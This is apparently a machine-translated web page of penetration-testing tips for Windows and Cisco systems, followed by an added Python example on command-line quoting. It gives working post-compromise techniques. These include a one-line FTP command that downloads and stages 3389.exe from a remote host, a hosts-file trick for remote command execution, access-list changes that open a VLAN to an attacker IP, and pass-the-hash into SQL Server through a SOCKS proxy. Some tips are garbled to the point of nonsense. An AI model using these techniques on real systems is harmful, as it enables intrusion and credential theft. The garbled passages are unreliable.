Penetration Testing tips

Source: Internet
Author: User

1. The system reports that the specified handle is invalid
Almost none of the results from a Baidu search solve this problem.
The correct fix is to obtain the remote machine's name when authenticating to the address \\1.1.1.1, for example ADMINPC. Then, in CMD:
echo 1.1.1.1 ADMINPC>>C:\windows\system32\drivers\etc\hosts
After that you can run at against it, and the "handle is invalid" prompt no longer appears.
Note: you do not actually need the remote party's host name. Simply echo any character in place of the host name.
2. One-line FTP download
Previously this was done with echo and then ftp -s, which was inconvenient. Use the following method.
echo open 10.0.0.1 >o & echo user 1 >>o & echo get 3389.exe >>o & echo quit >>o & ftp -n -s:o & del /F /Q o
3. Vista and later systems with LMHASH disabled (NTHASH)
LMHASH is disabled on newer systems, which is inconvenient during the cracking process. You can change this according to the following rule, but it takes effect only after the password is changed. If you do not change the password type when using metadata, LMHASH will not be stored. Metadata is used for targets that are more sensitive than metadata. It is okay to change the password type every day. This method applies when WCE is not being used.
[Image: Capture.gif]
4. Modify the Cisco access list to avoid a complicated "Buddha skip" process
SSH login to the IP, x.x
Login
en
IPE_CISCO# show access-list
IPE_CISCO# config terminal
IPE_CISCO# access-list 103 permit host 10.1.6.66 // allow this IP address to access all servers in VLAN103
IPE_CISCO# int vlan 103
IPE_CISCO# ip access-group 103 out
IPE_CISCO# exit
5. Making use of BKF files
In the Webshell environment, the elevation of permission is not allowed. A bkf: copy and download it, the login machine is restored, and WINPE is used for failover shift and to get the hash.
Then, go to the "pass" button of your project.
6. SQL intrusion based on replacing the system hash
Known hash of the target system:
Administrator:zhu:00000000000000000000000000000000:4A59CF37F6xxxxxx
System OS: 2003, SQL Server 2008. The hash value exceeds 14 characters. (For example, on 2003 the LMHASH is 000000000 or AA3DXXX if the password exceeds 14 characters.)
A webshell already exists. Because the permission could not be obtained, a SOCKS5 proxy is set up through Htran. WCE is used locally to set the target hash, and MSSQL is connected through the SOCKS5 proxy, selecting NT authentication.
Finished.
7. Note: Command.com
This command has existed all along from WIN95 through WIN2003 and is usually overlooked. In fact, it can also replace CMD.
8. IPC$ authentication when the password contains "
Password is: O *"#~) GbU [x
net use \\127.0.0.1 "O *\"#~) GbU [x" /u:administrator
Add \ before the " to solve the problem.
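Why the backslash in tip 8 works, as an added example that is not part of the original page: programs built on the Microsoft C runtime split their command line by fixed quoting rules, and \" is how a literal quote is passed inside a quoted argument. The sketch assumes net use follows that convention; quote_arg, parse_args, PASSWORD and COMMAND are names chosen here for illustration.

```python
# Added example (not from the page): argv quoting rules of the Microsoft C runtime.
# cmd.exe metacharacters (& | < > ^ %) are a separate layer and are not handled here.

def quote_arg(arg):
    """Quote one argument so a C-runtime program receives it unchanged."""
    if arg and not any(c in ' \t"' for c in arg):
        return arg
    out, slashes = ['"'], 0
    for ch in arg:
        if ch == '\\':
            slashes += 1
            continue
        if ch == '"':
            # Double the backslashes before a quote, then escape the quote itself.
            out.append('\\' * (2 * slashes + 1) + '"')
        else:
            out.append('\\' * slashes + ch)
        slashes = 0
    # Backslashes before the closing quote must be doubled as well.
    out.append('\\' * (2 * slashes) + '"')
    return ''.join(out)

def parse_args(cmdline):
    """Split a command line by the same rules (the "" shorthand is not implemented)."""
    args, cur, in_quotes, started, i = [], [], False, False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '\\':
            run = len(cmdline) - len(cmdline[i:].lstrip('\\')) - i
            i += run
            if cmdline[i:i + 1] == '"':
                cur.append('\\' * (run // 2))
                if run % 2:          # odd run: the quote is literal
                    cur.append('"')
                    i += 1
            else:
                cur.append('\\' * run)
            started = True
            continue
        if ch == '"':
            in_quotes, started = not in_quotes, True
        elif ch in ' \t' and not in_quotes:
            if started:
                args.append(''.join(cur))
                cur, started = [], False
        else:
            cur.append(ch)
            started = True
        i += 1
    if started:
        args.append(''.join(cur))
    return args

PASSWORD = 'O *"#~) GbU [x'   # the password from tip 8
COMMAND = 'net use \\\\127.0.0.1 ' + quote_arg(PASSWORD) + ' /u:administrator'
```

Without the backslash, the quote inside the password closes the quoted argument early and the password is split at its spaces, so the program never sees it as one argument.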
 
